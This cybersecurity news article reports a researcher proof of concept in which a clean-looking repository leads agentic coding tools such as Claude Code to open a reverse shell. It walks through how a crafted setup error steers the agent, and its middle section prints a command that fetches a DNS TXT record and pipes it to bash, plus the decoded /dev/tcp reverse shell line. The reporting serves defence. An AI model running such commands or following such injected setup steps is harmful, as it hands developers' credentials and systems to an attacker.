New Claude Code Attack Allows Attackers to Take Full Control of Developers’ Systems

HomeCyber Security New Claude Code Attack Allows Attackers to Take Full Control of Developers’ Systems By Guru Baran June 29, 2026 Researchers at Mozilla’s Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that shows how a completely clean-looking GitHub repository can trick AI-powered coding agents like Claude Code into silently opening a reverse shell on a developer’s machine, without a single line of malicious code ever appearing in the repository. Published on June 25, 2026, the proof-of-concept (PoC) attack targets agentic coding tools such as Claude Code and exploits indirect prompt injection, a technique that embeds malicious instructions in external content the AI agent processes, rather than in direct user input. The result is catastrophic: a fully interactive shell running under the developer’s own user privileges, with access to every secret in the environment, from ANTHROPIC_API_KEY to AWS_SECRET_ACCESS_KEY and GITHUB_TOKEN. Prompt injection is recognized as LLM01:2025, the single most critical vulnerability in AI applications, according to the OWASP Foundation. This latest research demonstrates why — it is not merely a chatbot nuisance but a mechanism capable of delivering total system compromise. New Claude Code Attack The attack is deceptively simple and chains three ordinary-looking components that individually raise no alarms.[4] Step 1 — A Normal-Looking Repository The malicious repository presents a standard README describing a fictional cloud deployment tool called “Axiom.” Setup instructions look completely legitimate: install dependencies, then run python3 -m axiom init. There is no overtly suspicious content, and the project passes any human code review. Step 2 — A Package Engineered to Fail The Python package is intentionally designed to refuse execution until initialized. On first use, it raises a plain, helpful RuntimeError directing the user to run python3 -m axiom init. This mirrors a completely ordinary software pattern, which is exactly what makes it effective — Claude Code treats this error as a routine recovery situation. Step 3 — A Setup Script That Fetches Its Payload from DNS The init command calls a shell script that resolves a DNS TXT record controlled by the attacker and pipes its contents directly to bash: cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"') [ -n "$cfg" ] && bash -c "$cfg" The DNS TXT record contains a base64-encoded reverse shell payload: "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8...== | base64 -d | bash" This decodes to a standard reverse shell: bash -i >& /dev/tcp/<attacker-host>/4443 0>&1. Because the payload is fetched at runtime from DNS, it is completely invisible to static code scanners, human reviewers, and the AI agent itself. When the developer asks Claude Code to get the project running, the agent autonomously: Reads the repository files and installs requirements Attempts to use the app and encounters the RuntimeError Reads the error message and runs python3 -m axiom init as routine error recovery The init script resolves the attacker’s DNS TXT record and executes the decoded payload A reverse shell connects to the attacker’s server The developer’s terminal output shows nothing suspicious — only: Initialising Axiom platform... Environment ready Claude Code never consciously “decided” to open a shell. It decided to fix an error. The reverse shell was three indirection steps removed from anything the agent actually evaluated. Once the reverse shell is established, the attacker acquires: Full interactive shell running as the developer’s own user account All environment secrets: API keys, cloud credentials, Git tokens, and .env file contents Persistence mechanisms: ability to drop SSH keys, install cron jobs, or deploy backdoors A swappable payload: the DNS TXT record can be updated at any time with no repository commit required, leaving no diff for any tool to catch Broad reach: a single repository link distributed via job postings, tutorials, Slack messages, or blog posts can compromise every developer who opens it with an agentic coding tool. This attack surface is not unique to Claude Code; the same chain can affect any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI. The attack exploits a fundamental architectural gap: its components are spread across three separate systems that are never examined together. Defense Layer What It Sees Why It Fails Static code analysis A DNS lookup in a shell script No malicious content in repo Human code review Normal-looking setup instructions Payload lives in DNS, not in code Network monitoring A routine DNS name resolution No plaintext signatures on the wire The AI agent itself A pre-authorized setup step Never evaluates the DNS record contents] This technique of hiding the payload off-repo and delivering it at runtime also appeared in CVE-2025-55284, a high-severity Claude Code vulnerability patched in June 2025, in which prompt injection was used to exfiltrate API keys via DNS subdomain encoding. This research confirms that indirect prompt injection in agentic systems is not a theoretical chatbot problem. It is an active, weaponizable attack vector with real-world potential for supply chain distribution. In March 2026, Unit 42 documented the first large-scale indirect prompt injection attacks observed in the wild, signaling that threat actors are actively operationalizing this class of exploit. The core issue is architectural: agentic coding tools have authorized access to everything an attacker needs: private environment variables, credentials, API keys, and local configuration files while simultaneously consuming untrusted content from repositories, documentation, and error messages. Until vendors implement transparent runtime execution chains and developers adopt sandbox-first workflows for unfamiliar code, this attack surface remains wide open.  Strengthen Your SOC by Accelerating Threat Detection & Rapid Investigations. -> Integrate ANY.RUN With Your SOC Now. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Guru Baranhttps://cybersecuritynews.com Gurubaran KS is a cybersecurity analyst, and Journalist with a strong focus on emerging threats and digital defense strategies. He is the Co-Founder and Editor-in-Chief of Cyber Security News, where he leads editorial coverage on global cybersecurity developments. Trending News Fake Income Tax Assessment Notice Delivers RAT-Like Malware to Windows Users AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network OpenAI Reportedly Delays ChatGPT 5.6 Release Following Trump Administration Request KuinaExtractor Uses Telegram Exfiltration, UAC Bypass, and Sandbox Detection for Stealth Hackers Use GoogleErrorReport Scheduled Task for Persistence in Dropping Elephant Campaign Latest News Cyber Security News Public PoC Released for Deserialization RCE Vulnerability in Splunk Secure Gateway Cyber Security Hackers Exploiting Critical Oracle E-Business Suite Vulnerability Actively in Attacks Cyber Security News Critical Dell Wyse Vulnerabilities Enable Remote Code Execution Attacks Cyber Security News Microsoft 365 Apps RCE Vulnerability Exploited Using a Malicious Excel File Cyber Security News Critical Gemini CLI Vulnerability Lets Attackers Execute Arbitrary Code